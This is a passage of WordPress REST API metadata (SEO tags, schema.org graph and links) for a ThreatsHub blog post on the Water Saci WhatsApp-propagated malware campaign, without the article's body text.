reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"25 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Unraveling Water Saci&#8217;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\",\"datePublished\":\"2025-12-02T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\"},\"wordCount\":5058,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Artificial Intelligence (AI)\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\",\"name\":\"Unraveling Water Saci's New Multi-Format, 
AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\",\"datePublished\":\"2025-12-02T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.o
rg\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Unraveling Water Saci&#8217;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 
Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","og_locale":"en_US","og_type":"article","og_title":"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2025-12-02T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"25 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Unraveling Water Saci&#8217;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp","datePublished":"2025-12-02T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/"},"wordCount":5058,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Artificial Intelligence (AI)","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","url":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/","name":"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","datePublished":"2025-12-02T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Unraveling Water Saci&#8217;s New 
Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www
.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=59779"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/59779\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=59779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=59779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=59779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}